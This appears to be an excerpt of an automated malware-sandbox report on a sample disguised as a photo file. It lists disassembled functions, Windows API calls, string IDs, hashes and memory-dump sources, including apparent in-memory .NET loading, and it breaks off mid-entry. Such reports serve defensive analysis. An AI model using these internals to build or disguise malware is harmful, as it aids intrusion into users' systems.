                                                                • API ID: CriticalInitializeSection_strlen
                                                                • String ID: 0Lc$0Lc$KTtD9Jr7XMES10V5
                                                                • API String ID: 2637759361-1887253053
                                                                • Opcode ID: 6cf196fe655b86f359bf02f235c6f8daa141465e2086124ea55931a4a954f60b
                                                                • Instruction ID: 8375cab4b384a22126d94bf823e4d83f4d4b6a565694864c28009c17555da470
                                                                • Opcode Fuzzy Hash: 6cf196fe655b86f359bf02f235c6f8daa141465e2086124ea55931a4a954f60b
                                                                • Instruction Fuzzy Hash: 6D31DBB194A3449EC305CF6ABD81655FBA6FB18700B91B66EE819C3360EF386500CBD9
                                                                Function 004120A2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,00000112,0000F120,00000000), ref: 0041214C
                                                                  • Part of subcall function 0041255D: IsWindow.USER32(00000000), ref: 00412563
                                                                  • Part of subcall function 0041255D: PostMessageW.USER32(00000000,00000010,?,00000000), ref: 00412577
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Message$PostSendWindow
                                                                • String ID: btn_close$btn_max$btn_min$btn_restore
                                                                • API String ID: 259590922-339682749
                                                                • Opcode ID: 509be6c4bddb667417872c2660ebd7a88e57c253b6da3508ef06294a512d53a0
                                                                • Instruction ID: 3d33c0b146c6885ed9be5917691e317505f4c660575bb1ea5ab13f9e0b935f1c
                                                                • Opcode Fuzzy Hash: 509be6c4bddb667417872c2660ebd7a88e57c253b6da3508ef06294a512d53a0
                                                                • Instruction Fuzzy Hash: 6B113831200A06FEDB14A754DD07EEE33A5FF09B19F1440ABF204E92E1EAB85D915A0D
                                                                Function 0040F6B1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040F6C8
                                                                  • Part of subcall function 004890F2: std::exception::exception.LIBCMT ref: 00489107
                                                                  • Part of subcall function 004890F2: __CxxThrowException@8.LIBCMT ref: 0048911C
                                                                  • Part of subcall function 004890F2: std::exception::exception.LIBCMT ref: 0048912D
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040F6EA
                                                                • _memmove.LIBCMT ref: 0040F727
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                • String ID: invalid string position$string too long
                                                                • API String ID: 3404309857-4289949731
                                                                • Opcode ID: 24dda325fd02ed5ee351b63d354143cc3b30426128b5c6e66eccb46382aba22c
                                                                • Instruction ID: 0dd7f698f7fa93d4564c044f18ae46b324baf27ffd31eac9a97bd246b55a6886
                                                                • Opcode Fuzzy Hash: 24dda325fd02ed5ee351b63d354143cc3b30426128b5c6e66eccb46382aba22c
                                                                • Instruction Fuzzy Hash: 2911BB313002049BDB34DE6CD981A2AB3E9FB05700B00093EF452EBAC1C3B8ED49879A
                                                                Function 004015C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 004015DD
                                                                  • Part of subcall function 004890F2: std::exception::exception.LIBCMT ref: 00489107
                                                                  • Part of subcall function 004890F2: __CxxThrowException@8.LIBCMT ref: 0048911C
                                                                  • Part of subcall function 004890F2: std::exception::exception.LIBCMT ref: 0048912D
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 004015FC
                                                                • _memmove.LIBCMT ref: 0040163F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                • String ID: invalid string position$string too long
                                                                • API String ID: 3404309857-4289949731
                                                                • Opcode ID: 1e5502ac79605a9690f98a7585fab7779558b3290846562f5399e9a41dba4a86
                                                                • Instruction ID: f221e9edee5dda165917a9830cf63c76d6c3eb867ec99c49108ed27ce9bfa2db
                                                                • Opcode Fuzzy Hash: 1e5502ac79605a9690f98a7585fab7779558b3290846562f5399e9a41dba4a86
                                                                • Instruction Fuzzy Hash: 5E1181303046049BCB14EE6CD9C182A73E6BF85714B24492EE457DB2A0E735E945CB98
                                                                Function 0043DD8E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00415F2F: _wcslen.LIBCMT ref: 00415F4A
                                                                  • Part of subcall function 00415F2F: _free.LIBCMT ref: 00415F64
                                                                  • Part of subcall function 00415F2F: _wcsncpy.LIBCMT ref: 00415FA0
                                                                • _memset.LIBCMT ref: 0043DE3B
                                                                • _wcsncpy.LIBCMT ref: 0043DE4F
                                                                • CLSIDFromString.OLE32(?,00000A20,?,?,?,0000000A,00000000,00000004), ref: 0043DE65
                                                                  • Part of subcall function 00415EAC: _free.LIBCMT ref: 00415EB6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _free_wcsncpy$FromString_memset_wcslen
                                                                • String ID: 8a`${D27CDB6E-AE6D-11CF-96B8-444553540000}
                                                                • API String ID: 1162813181-4266415877
                                                                • Opcode ID: bde6bad799129f8c7aad8fa6f0d8462af97ec9ee34ab14a3ff47a0ef3c72b834
                                                                • Instruction ID: 6c0016fed9268d737e29b7f905bae1fd445dcb63e95491f5949a4ee70fcf9d53
                                                                • Opcode Fuzzy Hash: bde6bad799129f8c7aad8fa6f0d8462af97ec9ee34ab14a3ff47a0ef3c72b834
                                                                • Instruction Fuzzy Hash: 6621C6B1A402189BDB10EF66CC85ADEBBF9EF45318F0045FAE80D9F291DB744A448F65
                                                                Function 00448AD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 55libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 00448AF1
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlGetVersion), ref: 00448B1D
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00448B24
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc_memset
                                                                • String ID: RtlGetVersion$ntdll.dll
                                                                • API String ID: 3368017834-1489217083
                                                                • Opcode ID: f3726da580d3fa7bd3a8cf6554a2e604973b3c433cfb00128e0b4ce4dad54d03
                                                                • Instruction ID: cc79318f3fc397d9c93802ee6968ba6348ff87c363e334e6d1f7c9e4dad1c710
                                                                • Opcode Fuzzy Hash: f3726da580d3fa7bd3a8cf6554a2e604973b3c433cfb00128e0b4ce4dad54d03
                                                                • Instruction Fuzzy Hash: CB118CB0A042099FDB24AFA5AC427EEB7F4EF18704F00459EEC0596381DF34A9049B98
                                                                Function 00448C30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 00448C96
                                                                • PathRemoveFileSpecW.SHLWAPI(?), ref: 00448CBB
                                                                • _wcslen.LIBCMT ref: 00448CC8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: File$ModuleNamePathRemoveSpec_wcslen
                                                                • String ID: 8Pc$8Pc
                                                                • API String ID: 2359764448-3218395350
                                                                • Opcode ID: 88fad58353e0be9cc1daf14e6cd6ad70c85f459d5f58cfdb4bb4fd31db93a899
                                                                • Instruction ID: 909fc3d8320d8d5ff31be9910dd373dd834299062df9edea329e0f2c87814443
                                                                • Opcode Fuzzy Hash: 88fad58353e0be9cc1daf14e6cd6ad70c85f459d5f58cfdb4bb4fd31db93a899
                                                                • Instruction Fuzzy Hash: 2211CAB09016088BEB14EF64ED85BAD77B5DF54304F0008AEEA0A97251DB795D48CBD9
                                                                Function 00463920 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41registrywindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegisterClassW.USER32(?), ref: 00463961
                                                                • CreateWindowExW.USER32(00000000,ThreadingWindowClass,00000000,00000000,80000000,00000000,80000000,00000000,000000FD,00000000,00000000,00000000), ref: 00463988
                                                                • RegisterWindowMessageW.USER32(com.duoyi.MainThreadFired), ref: 00463998
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: RegisterWindow$ClassCreateMessage
                                                                • String ID: ThreadingWindowClass$com.duoyi.MainThreadFired
                                                                • API String ID: 386166360-3307278354
                                                                • Opcode ID: b9c52af72ae04d9580758a8473508b03963a02cd14ecd3ec60e805117030e1cb
                                                                • Instruction ID: a83fa76dfc6efe33082e142adbdacec859ccde1740008b0ff8e2a94b7595681d
                                                                • Opcode Fuzzy Hash: b9c52af72ae04d9580758a8473508b03963a02cd14ecd3ec60e805117030e1cb
                                                                • Instruction Fuzzy Hash: 3E011EB0D81309AFDB50DFA89D45BCD7EF1BB08711F20656AE608F62C0E3B016448BA9
                                                                Function 0040CDCE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 32COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0040CDD5
                                                                  • Part of subcall function 00416369: _memset.LIBCMT ref: 00416393
                                                                  • Part of subcall function 00412A0F: __EH_prolog3_GS.LIBCMT ref: 00412A16
                                                                  • Part of subcall function 00412A0F: _memset.LIBCMT ref: 00412BDD
                                                                  • Part of subcall function 00412A0F: GetStockObject.GDI32(00000011), ref: 00412BED
                                                                  • Part of subcall function 00412A0F: GetObjectW.GDI32(00000000), ref: 00412BF4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Object_memset$H_prolog3H_prolog3_Stock
                                                                • String ID: $_$,_$4_$<_
                                                                • API String ID: 1798168711-15178913
                                                                • Opcode ID: 5d08dab5d234d54d9bee2adc54536685e8d92344b53b9c209b9b31be4e6857c3
                                                                • Instruction ID: e53788f026098f13ebb1548982cc3b0f3858756e730f32a0392594679e80ba11
                                                                • Opcode Fuzzy Hash: 5d08dab5d234d54d9bee2adc54536685e8d92344b53b9c209b9b31be4e6857c3
                                                                • Instruction Fuzzy Hash: 8301C2B15003488FDF50EF15C28A3A53FE4BF09319F1155A99E489F25AC7B8D948CBAA
                                                                Function 0040CD3A Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 21COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0040CD41
                                                                  • Part of subcall function 00412D45: __EH_prolog3.LIBCMT ref: 00412D4C
                                                                  • Part of subcall function 00412D45: KillTimer.USER32(?,?,00000000,0000000C,0040CD80,?,00000004,00403A81,00000001,00000001,00000001,00000001,00000001,00000001,?,00000001), ref: 00412DD4
                                                                  • Part of subcall function 00412D45: DeleteObject.GDI32(?), ref: 00412E0F
                                                                  • Part of subcall function 00412D45: DeleteObject.GDI32(?), ref: 00412E2A
                                                                  • Part of subcall function 00415EAC: _free.LIBCMT ref: 00415EB6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: DeleteH_prolog3Object$KillTimer_free
                                                                • String ID: $_$,_$4_$<_
                                                                • API String ID: 1839263498-15178913
                                                                • Opcode ID: ede641e809ffd897c420787cbf87ec9f991896deb15741c5ab5261ceaa212985
                                                                • Instruction ID: 08d94c975116306d262f26787f95596abf4d057f34d26c542614b3f08a2bff6c
                                                                • Opcode Fuzzy Hash: ede641e809ffd897c420787cbf87ec9f991896deb15741c5ab5261ceaa212985
                                                                • Instruction Fuzzy Hash: F9F0A2B44007448FCB60EF65D6062EABFF4BF04704B40195DA2C55BA61D7F86548CB69
                                                                Function 02472F99 Relevance: 7.8, APIs: 5, Instructions: 270memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 02472FA0
                                                                • CLRCreateInstance.MSCOREE(10019868,10019858,?), ref: 02472FBA
                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 024730BE
                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 024730ED
                                                                • SysAllocString.OLEAUT32(?), ref: 0247319F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ArrayDataSafe$AccessAllocCreateH_prolog3InstanceStringUnaccess
                                                                • String ID:
                                                                • API String ID: 3666180938-0
                                                                • Opcode ID: 44eb9ee277fd45cbe9789f601392d5aef2c6ce648ac6e213b405d3a886132e71
                                                                • Instruction ID: f31f6fc7d8a5f092760c5040fa7308f8434fc6c720d53818db8d6704a243ddbb
                                                                • Opcode Fuzzy Hash: 44eb9ee277fd45cbe9789f601392d5aef2c6ce648ac6e213b405d3a886132e71
                                                                • Instruction Fuzzy Hash: B3A10771E00289AFDB00DFE8C8889EEBBBAFF49304F5444AEE215EB251D7359945DB50
                                                                Function 10002F95 Relevance: 7.8, APIs: 5, Instructions: 270memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 10002F9C
                                                                • CLRCreateInstance.MSCOREE(10019868,10019858,?), ref: 10002FB6
                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 100030BA
                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 100030E9
                                                                • SysAllocString.OLEAUT32(?), ref: 1000319B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ArrayDataSafe$AccessAllocCreateH_prolog3InstanceStringUnaccess
                                                                • String ID:
                                                                • API String ID: 3666180938-0
                                                                • Opcode ID: 44eb9ee277fd45cbe9789f601392d5aef2c6ce648ac6e213b405d3a886132e71
                                                                • Instruction ID: 057d9618c9b2eace4bdb604887b9081d3f24a166150124c3c6b43a88f9cf3334
                                                                • Opcode Fuzzy Hash: 44eb9ee277fd45cbe9789f601392d5aef2c6ce648ac6e213b405d3a886132e71
                                                                • Instruction Fuzzy Hash: F1A13871A00249EFEB01CFE4CC989AEBBB9FF49344F608469E605EB251C7359E46CB10
                                                                Function 0048DF4C Relevance: 7.7, APIs: 5, Instructions: 160COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                • String ID:
                                                                • API String ID: 4048096073-0
                                                                • Opcode ID: 56babde01ab4d96fff189b41497c508f4dc93bbf3c9435e73c0b35722ccf642a
                                                                • Instruction ID: fd8c74bca4243f5a569a8e9e669424ff47381017a1596438181cd01a19491b53
